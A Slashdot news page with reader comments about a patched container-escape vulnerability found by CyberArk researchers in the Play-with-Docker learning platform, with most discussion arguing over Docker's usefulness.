Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Security Bug Privacy Software

Hack Allows Escape of Play-With-Docker Containers (threatpost.com) 45

secwatcher quotes a report from Threatpost: Researchers hacked the Docker test platform called Play-with-Docker, allowing them to access data and manipulate any test Docker containers running on the host system. The proof-of-concept hack does not impact production Docker instances, according to CyberArk researchers that developed the proof-of-concept attack. "The team was able to escape the container and run code remotely right on the host, which has obvious security implications," wrote researchers in a technical write-up posted Monday.

Play-with-Docker is an open source free in-browser online playground designed to help developers learn how to use containers. While Play-with-Docker has the support of Docker, it was not created by nor is it maintained by the firm. The environment approximates having the Alpine Linux Virtual Machine in browser, allowing users to build and run Docker containers in various configurations.
The vulnerability was reported to the developers of the platform on November 6. On January 7, the bug was patched. As for how many instances of Play-with-Docker may have been affected, "CyberArk estimated there were as many as 200 instances of containers running on the platform it analyzed," reports Threatpost. "It also estimates the domain receives 100,000 monthly site visitors."
This discussion has been archived. No new comments can be posted.

Hack Allows Escape of Play-With-Docker Containers

Comments Filter:
  • by Anonymous Coward

    WTF is a docker?

    • Re:Okay, but... (Score:5, Insightful)

      by phantomfive ( 622387 ) on Monday January 14, 2019 @07:11PM (#57962660) Journal
      OK, imagine you are a dev team, and you don't know how to write an install script for your software. No problem, just load it into docker once, and you don't have to worry about cleaning up your install scripts.

      There are some valid use cases, but what I just described is the main one people use in the modern world. There are people who think things like, "Makefiles (or Maven or whatever) are too complicated because they don't allow you to have loops and functions." Nah, these are signs you are making things too complicated and they should be simplified.

      Oh, and while I'm criticizing things like an old man, I'll just add that the primary use for mongodb is people who don't know SQL or how to write a schema. That isn't everyone, and there are some valid reasons to use NoSQL, but a primary use case is people who don't know databases.
      • Re:Okay, but... (Score:4, Informative)

        by Richard_at_work ( 517087 ) on Monday January 14, 2019 @07:50PM (#57962864)

        I describe Docker as "an environment in a tin". You don't need to care about setting up full VMs for two bits of software that normally conflict, just run them on the same host under Docker with less overhead than full VMs. Upgrades are trivial as well.

        Being able to set up complete development environments (cache, database, reverse proxies, app servers etc) on each developers box with a single command - brilliant. Each developer can develop in an environment which mimics the production environment much more closely these days, because the two environments might indeed be created using the same Docker Compose file.

        Docker is brilliant.

        But what it isnt, and what pretty much every experienced Docker user will tell you it isnt, is a security system.

        • Being able to set up complete development environments (cache, database, reverse proxies, app servers etc) on each developers box with a single command - brilliant

          So, I want you to know, if your install scripts aren't able to do this, your install scripts are broken. You can add "check out and build it" with a single command, too.

          • Thats some interesting install scripts, if they can set up complex environments, including networks, hosts, DNS and the like... And how does your install scripts handle multiple copies of completely isolated environments, for testing purposes?

            But then there are many ways to do these things - Docker is one of them. And I can remove a Docker environment in seconds (just rm -f the containers and networks - gone, as if they never existed).

            • , if they can set up complex environments, including networks, hosts, DNS and the like

              Even Windows can do all that on the command-line, are you setting up DNS from a GUI app or something?

              Anyway, it doesn't really matter. There are certainly some cases where Docker is a good idea, and maybe your setup is one of them. You can tell pretty easily: are your install scripts a mess? Or can you install your software to a new target with a single command? Why is your build and deploy so complex?

            • by fwad ( 94117 )

              You hand edit all this stuff? I guess that's call job security - until you get a boss that knows what a computer is and gives you a month to sort your stuff out otherwise you're fired.

              I'm not saying docker doesn't have it uses (I know of one place whos' build process actually automatically builds a cleaner docker image and this gets deployed to the farm) but a work around for writing good software isn't one of them

      • As a 25 year veteran of DB programming on Oracle, SQL Server, Cassandra, Mongo, I would like to state that you are wrong about that. Sure, some people just don't know how to use a relational database properly, so they go schemaless, but what I like to call an "HR problem, not a technology problem." A lot, if not most, problem domains don't fit the relational model very well. A lot of systems store complex, dynamic hierarchical customer data. My daily job is storing unpredictable user-entered data (dynam
        • This is a good post.
        • by Bengie ( 1121981 )
          Relational databases are not ideal for non-relational data? I see the opposite in my line of work. People using document database for relational data, then they have to constantly fix data inconsistencies. I always just assumed that I should use the best tool for the job, but I found out in the real world that most just use whatever they're most used to or is the current fad. Technology is magic. If you want your project to succeed, you need to do the current fad rain dance. If that's RDBMS, then you do the
    • At its core, a tar file and instructions how to run it. :)

    • A slimmed down VM.

      https://www.docker.com/resourc... [docker.com]

  • Show me a company that's been running VMs or containers for years and I'll likely show you a mess of orphaned guests or containers, oversubscribed hosts, and a management and IT group that's disconnected from their actual resources because they feel they can stretch them forever due to memory balloons, thin disks, HyperThreading||SMT, and other consolidation features that often have a very sharp double edge to them. I'm not saying VMs and containers have no place, I'm just saying they are often a roach motel and often very poorly understood and administered.
    • Depends. (Score:2, Interesting)

      by Anonymous Coward

      I've worked 3 places since virtualization became mainstream in the early 2000s. In 2003, we mandated that all new systems go onto VMs and mandated that our vendors support it. We were the 25,000 gorilla, so this worked.
      A few specialized systems got dedicated hardware because the system was tied to the hardware, but that was the exception, by far.

      None of the projects I know about ever oversubscribed VMs, RAM, Storage or networking. Our CPU target was 80%. Before we started virtualizing, the average system u

    • IBM has been doing it properly since the 1980s.

      • I've worked with some z/OS boxes before and experienced their virtualization. I agree and haven't seen the same sprawl or crazy growth->neglect->stagnation->waste cycle that I've seen with VMware shops. However, the reasons aren't obvious. I'd say that the licensing costs are too high and the skillset too narrow so it simply doesn't get used to the same degree as more common VM solutions. Also, the "practices" are different for z/OS to some degree. However, it does have some things in common with V
  • Libraries are such a problem that you need virtual filesystems from the developer to actually run their program?

  • never let them escape the container, not even with a hacksaw.

    Wait, what?! People actually want to run OS containers... in a browser? Isn't this taking "clientless" a bit far? Play-With indeed.

    Play with your own Docker, people, and you won't get infected.

  • I've encountered docker with OpenFoam. For the user, it's a mess. In the setup I experimented with, it used virtualization, so right out of the gate, 10% the performance is gone, in electricity and wasted heat. Docker is an ugly, ugly attempt at cross-platform.
  • What is the problem? A configuration error? Then it's a non-story, badly configured docker environments are a dime a dozen. A docker bug? Then say so, so we can patch our docker environments. A fundamental flaw in the docker environment that breaks the whole docker-concept for good? NOW you'd have a story!

    WTF is it?

    • by Anonymous Coward

      Aside from the fundamental flaw that docker gives an illusion that it's a safe way to run untrusted code... :-)

      In this case, the debugfs command was available in the container and was able to bypass the AppArmor profile and gain access to the host filesystem. From there they were able to find everything they needed to build a reverse shell kernel module and load it to get full shell access to the host.

You know you've landed gear-up when it takes full power to taxi.

Working...